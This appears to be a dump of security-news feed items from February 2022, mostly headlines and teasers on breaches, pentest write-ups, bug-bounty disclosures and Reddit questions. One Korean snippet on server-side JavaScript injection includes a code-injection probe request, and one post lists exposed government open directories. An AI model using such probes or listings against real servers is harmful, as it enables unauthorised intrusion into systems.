    很多网站因为业务需要,在同一个主域名下通常会有多个子域名。在这种情况下申请SSL证书就要很慎重,既要考虑到网站安全需要,又要考虑经济实惠,首选肯
    光大银行安全处招聘简章
    招聘安全工程师、安全运营、安全管理等岗位。
    安徽省委统战部副部长张启明带队调研全息网御合肥研发基地
    近日,安徽省统战部副部长张启明带队调研全息网御合肥研发基地,着重听取了全息网御自主创新的核心技术,聚焦数据安全的产业定位与合纵连横的生态合作应用场景,并就科技型企业的未来发展进行深入交流。他指出
    GPU巨头英伟达遭“​毁灭性”网络攻击、头号恶意软件关闭其僵尸网络基础设施|2月28日全球网络安全热点
    被称为TrickBot的模块化Windows犯罪软件平台于周四正式关闭其基础设施,此前有报道称其在近两个月的活动停滞期间即将退休。
    欧盟正式公布《数据法案》、乌克兰再遭DDoS攻击、厨具巨头美亚遭攻击内部数据泄露|网络安全周报
    2月23日,欧盟委员会公布了名为《数据法案》(Data Act)的提案,旨在帮助小公司在竞争中赶上大公司,从智能家电到汽车等联网产品产生的非个人数据中获利。
    Portswigger 文件上传系列 File Upload详细笔记
    其实也算是很早就听说了文件上传漏洞,并在一些CTF比赛中做了一些题目,再刷一遍port的吧。
    匿名者组织入侵白俄罗斯铁路内部网络
    匿名者组织入侵白俄网络,并影响起铁路运营。
    英伟达遭遇网络攻击,1TB数据被盗
    攻击影响了公司的开发人员工具和电子邮件系统,并窃取了包括员工在线凭证在内的1TB数据。
    2021年未修补漏洞利用为勒索软件攻击依赖主要切入点
    未修补软件的漏洞利用导致的攻击增加了33%,这是2021年勒索软件攻击者进行攻击最依赖的切入点,在勒索软件攻击原因中占44%。
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry- Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk. READ MORE
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan. READ MORE
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »

  • Open

    Fotoğraflardaki metin nasıl kopyalanır?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    I hate Marinas, It’s too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos’s blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Gölgene dikkat et: fotoğraftaki gölgelerden fotoğrafın ne zaman çekildiğini nasıl anlarız?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering what all that's going on if I should be more concerned than usual. I'd just like my computer and data to remain in once piece. Not sure if I should be saying anything else about my setup on a public post here but could appreciate some advice. Only tech guy in my family so can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of Pfsense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398 [link] [comments]
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed fedora on my desktop but it showed all the apps I installed on window previously. (it's not a dual boot) Did I mess something up when installing? or is it a vulnerability? submitted by /u/manho1e [link] [comments]
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are ensuring it’s for that proper site? What if the certificate says self-signed or expired? submitted by /u/pass-the-word [link] [comments]
  • Open

    Qualsys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various governments open directories
    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic Tv in the ‘90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia [link] [comments]
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in sarasa folder submitted by /u/LucasImages [link] [comments]
  • Open

    Brian Rea (DeviantOllum Deviant) and Lesley Carhart (Hacks4Pancakes) continue their harassment of me
    Please notice I left these people alone for a long period of time and then they start harassing me. Seriously search for when I've mentioned them here last. The line I crossed with her, I blocked her mostly because she pushed some silly stuff that ended my con.
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two factor Authentication
    There are multiple ways to bypass two factor authentication . some of these way is here . Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    Special 50% Discount for My 100GB "Cybercrime Forum Data Set for 2022" Today! Grab a Copy Today!
    Dear blog readers,Who wants to obtain direct download access to my 100GB "Cybercrime Forum Data Set for 2022" with a 50% discount which I'm offering only today for research data mining and enrichment purposes?Drop me a line at dancho.danchev@hush.comSample photos of the actual content: Stay tuned!
    Courtesy of Republic of Bulgaria!
    This is me! And this is me! On the run. Awesome!Cool! Awesome! More cool stuff! Even more cool stuff! Including this! Including this!This is cool!Even more cool! - check out the Illegal Restraint section! Awesome!Quote: "The Mentally Ill or Disabled"With few exceptions, material conditions in psychiatric hospitals and social care institutions for children and adults with developmental
    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four
    Dear blog readers,Continuing the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Three" blog posts series I've decided to share yet another currently active portfolio of ransomware themed email address accounts currently involved in a variety of campaigns.Sample ransomware-themed personal email address accounts known to
    The Cyber War Between Russia and Ukraine - An OSINT Analysis
    Dear blog readers,I've decided to take a deeper look inside the currently ongoing cyber war between Russia and Ukraine and I've decided to provide actionable intelligence on the online whereabouts and actual campaign infrastructure behind the currently ongoing campaigns which appear to be several crowd-sourced campaigns which I profiled including various other modest engagement "touch points"
  • Open

    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
  • Open

    Sequential Import Chaining을 이용한 CSS 기반 데이터 탈취
    오늘은 CSS 기반의 공격 기법인 Sequential Import Chaining에 대해 이야기하려고 합니다. 자체적으로 뭔가 영향력이 있는건 아니지만, CSS를 제어할 수 있을 때 영향력을 증폭시켜줄 수 있는 방법이니 꼭 알아두고, 유용하게 사용하시길 바래요 😊 Sequential Import Chaining Sequential Import Chaining은 d0nutptr이 제시한 공격 기법으로 CSS Injection이나 RPO(Relative Path Overwrite) 시 영향을 올리기 위한 Exploit 방법 중 하나입니다. 이 방법은 CSS의 Attribute Selectors란 기능, 즉 DOM Object의 value 값에 따라서 스타일을 지정할 수 있도록 제공하는 기능을 이용한 방법인데요.
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334 [link] [comments]
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong [link] [comments]

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    Server-Side Javascript Injection (SSJI)
    🔍 Introduction SSJI(Server Side Javascript Injection)는 서버가 자체적으로 Javascript를 처리하는 엔진을 가지거나, 백엔드에서 Headless browser 등을 통해 처리하는 로직이 있는 경우 공격자가 이를 제어하여 서버사이드에서 원하는 Javascirpt를 실행하도록 하는 공격입니다. 🗡 Offensive techniques Detect eval(), setTimeout(), setInterval() 등의 JS 함수를 포함한 요청을 전달하여 서버 사이드에서 이를 처리하는지 식별하면 됩니다. 가장 간단한 방법으론 setTimeout과 setInterval을 이용한 딜레이 체크입니다. Request 1 GET /import?unloadcode=setTimeout(a%3d1,%205000) HTTP/1.1 Response 1 2 3 HTTP/1.
    Relative Path Overwrite (RPO)
    🔍 Introduction RPO(Relative Path Overwrite)는 relative URL, 즉 상대 경로 기반의 URL을 덮어써서 의도하지 않은 동작을 수행하는 공격 방법입니다. Relative Path Confusion이라고도 불리며 본 문서에서는 RPO로 통일하여 작성하곘습니다. RPO를 웹에서 이야기할 땐 보통 시스템에서 사용하는 Relative Path(e.g ../../app)와 Absolute Path(e.g /app) 과 약간 다른점이 있으니 참고하시길 바래요. Path Description Example Absolute URL Host가 포함된 URL Relative URL Host가 포함되지 않은 URL <src="/file.
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss [link] [comments]
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but a MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1 [link] [comments]
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Is there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411 [link] [comments]
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing but having seen this sub mentioned I figured Id bring it up here. submitted by /u/Tripartist1 [link] [comments]
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt [link] [comments]
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry so just though I would ask out of curiosity. submitted by /u/xnospax [link] [comments]
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    Meu primeiro bug em apenas 5 minutos
    Olá hacker, hoje vou contar sobre como encontrei meu primeiro bug (vulnerabilidade)em apenas 5 minutos Continue reading on Medium »
    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android App pentest The app has a functionality to purchase courses So what can be the best way to bypass it Intercepting it through burp and try some manipulation as we do in Web apps Or some Reverse Engineering Stuff will work here ( Which I don't think makes sense ) If anybody has any experience Pentesting apps with similar functionalities Your Help is appreciated!! submitted by /u/Chirag_Offsec22 [link] [comments]
    Moving Into cyber security!
    Switching careers into security Hey everyone! So fairly new to the IT world, as title says I’m switching careers from being an executive chef for the past 16 years into cyber security. I’m starting a 6 month boot camp soon with GSU and afterwards I’ll get my sec+. I’ve been doing a lot of my own research by reading as much as I can, being active in a lot of different forums and have already put 50+ hours on tryhackme (which has been awesome) and putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk, I’m hoping some of the leadership, team building and communication skills i learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996 [link] [comments]
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decide to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

    开源远程服务器管理工具箱:UltimateShell
    为渗透测试工程师、程序员、网站管理员、IT 管理员以及几乎所有需要以更简单的方式处理远程工作的用户提供大量定制功能。
  • Open

    Dancho Danchev's Sample Personal Conference and Event Photos - A Compilation
    Dear blog readers,I've decided to share with everyone a set of personal conference and event photos.Enjoy!
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in admin panel and how i escalated the severity from Low to critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    CSRF (Siteler Arası İstek Sahteciliği), kimliği doğrulanmış kullanıcının web sayfasında istenmeyen faaliyetler gerçekleştirmesine olanak… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    “If you can’t bake a cake then hack the entire cake shop” — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    this illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I’ll give you a Shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)
    After 3 months, I manage to bypassed again the default visibility for newly-added email in Facebook. Here is the link of my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven’t seen my introduction to this case, please take few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bintfinex exchange. the coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che [link] [comments]
    BGP Security in 2021
    submitted by /u/danyork [link] [comments]
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity [link] [comments]
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Readteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-plateform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display:)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che [link] [comments]
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similiar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but, I would like something closer to an app, than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1 [link] [comments]
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Lets just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in rce chains Now let me explain why its a powerful vuln class say you find one on the login page of a website you now have pre auth file read and for example could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now lets say they patch this in a lot of cases you can password spray a random user and find a post auth file read and now instead of an auth bypass its more of an authorization bypass now your a normal user but can read admin areas and admin log files that may have juicy stuff. Ive ran into this scenario many times where they’ll patch a pre auth one but a post auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252 [link] [comments]
    Is there any interesting flaws or attacks against SFU’s or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFU’s from p2p so it would be interesting to exploit low level sfu implementations for rce and maybe exploit the general logic of an sfu for ip disclosures etc. I haven’t seen like any research on SFU’s. One interesting idea is forcing other clients to connect to you by claiming your an SFU server not even sure if thats possible but would be interesting. submitted by /u/Academic-Discount252 [link] [comments]
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor [link] [comments]
    Is this worth it?
    I'm reading up on zero trust and keeping hearing about it but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec [link] [comments]
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the twitter of Recoreded Future and Greynoiseio. Both of them anoounced that they would apply full resources and capabilities to support ukraine in their fight against Russia. Trying to find a sub that can aswer this... seems reasonable from someone that knows little about the cyber world, So... Is it really helpful for defend ukraine agianst from russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288 [link] [comments]
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and im a junior. The requirements is that I "interview" someone and I dont know anyone in real life, I hope its okay thank you submitted by /u/Mokushi99 [link] [comments]
    What is the going rate for a zero day these days?
    Curious of what the going rate for a zero day is on the black market; or even the legit market. submitted by /u/me_z [link] [comments]
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Invoke-EDRChecker:一款功能强大的主机安全产品检测工具
    该工具能够对正在运行的进程进行详细的安全检查,包括进程进程元数据、加载到当前进程中的DLL以及每个DLL元数据。
    以数据为中心的数据安全基础能力建设探索
    本文数据为中心的理念,围绕数据识别、分类分级、基础防护几个方面,结合开源软件做一次梳理和功能演示。
    FreeBuf早报 | 三星上亿部手机曝出严重加密漏洞;乌克兰招募黑客防御俄罗斯网络攻击
    由于大规模分布式拒绝服务(DDoS)攻击,多个乌克兰政府网站于周三下线了。
    CISA 已知被利用漏洞列表中,新增两个 Zabbix 漏洞
    美国网络安全基础设施和安全局(CISA) 在其已知利用漏洞目录中新增两个Zabbix 漏洞。
    FreeBuf甲方群话题讨论 | 聊聊复杂形势下的企业安全预算
    《个保法》、《数据安全法》、log4爆发,最近一年来安全圈的频繁动作会给今年企业安全预算带来哪些影响?
    微软应用商店现“克隆”游戏,内涵恶意程序Electron Bot
    通过克隆《地铁跑酷》 和《神庙逃亡》等流行游戏,Electron Bot已渗透进了微软应用商店。
    俄乌战争期间,美国警告要注意“浑水”趁乱搞事情
    美国和英国发布警告称,一个已经确定有伊朗国家背景的黑客组织正在俄乌大战期间,针对全球目标开展数字攻击以及其他的恶意活动。
    微软Exchange服务器被黑客攻击以部署Cuba勒索软件
    勒索软件Cuba正利用微软Exchange的漏洞进入企业网络并对设备进行加密。
    积跬步,至千里,白帽积木的挖洞之路
    近4年,从小白到MVP的挖洞之路。
    研究发现,元宇宙的成人内容对未成年用户开放
    据BBC的一项最新调查,儿童可以通过元宇宙访问性方面的相关内容。
    保护力度不够的Microsoft SQL数据库正成为黑客攻击的目标
    日前有数据显示,黑客正在易受攻击的Microsoft SQL数据库中安装Cobalt Strike信标,以此获得在目标网络中的立足点。
    重磅!全球黑客组织对俄罗斯发起“网络战争”
    战争让人们更加珍惜来之不易的和平:我们从不欢呼战争,但也不惧怕战争。
    如何使用PHP Malware Finder检测主机中潜在的恶意PHP文件
    PHP Malware Finder是一款针对主机安全和PHP安全的强大检测工具,广大研究人员可以轻松检测其主机或服务器中可能存在的潜在恶意PHP文件。
    FreeBuf周报 | Monzo数字银行用户正受网络钓鱼威胁;Meyer披露影响员工的网络攻击
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!热点资讯1、白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上2、英国Monzo数字银行用户正受网络钓鱼威胁3、数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元4、暴富、反水、围剿……Conti勒索组织魔幻的2021年5、这样的钓鱼邮
    乌克兰政府和金融机构遭疑似俄黑客袭击
    这一恶意软件被部署在乌克兰网络上的数百台设备当中。
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: 每日安全日报的爬虫和推送程序 by ourren cheatsheet: 信安技术羊皮卷 by ourren 代码分析与自动化重构 by ourren 企业级安全智能化实践指南 by ourren 针对Cookie同意和 GDPR 违规的自动化检测工具 by ourren CodeQL 与 Shiro550 碰撞 by ourren 路由器TP-Link WR740后门漏洞 by ourren Parallels Desktop虚拟机逃逸 by ourren k8s安全入门 by ourren 更多最新文章,请访问SecWiki
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »

  • Open

    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0
  • Open

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369 [link] [comments]
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Understanding Threat Actor’s by @berkdusunur
    submitted by /u/EyeAccomplished5529 [link] [comments]
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut [link] [comments]
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Curious
    out of curiosity are my chances good to land a junior infosec job, SOC analyst, or a sysadmin position based on my work experience it’s not a lot and i am new to the IT field but to sum it all up the only work experience i have is when i was a geek squad agent at best buy, when i worked at a call center, and most recently i got a job as a junior help desk technician i also have 0 certs by the way and i’m too lazy to send it my actual resume hahaha submitted by /u/Jkarl0880 [link] [comments]
    Doubt on Session Cookies
